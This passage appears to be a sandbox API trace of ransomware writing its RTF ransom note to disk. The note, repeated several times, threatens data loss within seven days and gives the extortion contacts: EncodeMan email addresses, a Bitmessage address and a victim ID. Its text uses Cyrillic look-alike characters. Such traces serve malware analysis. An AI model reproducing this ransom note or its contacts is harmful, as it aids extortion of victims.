y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0268.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0268.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0268.703] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0268.707] CloseHandle (hObject=0x2ec) returned 1 [0268.707] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package 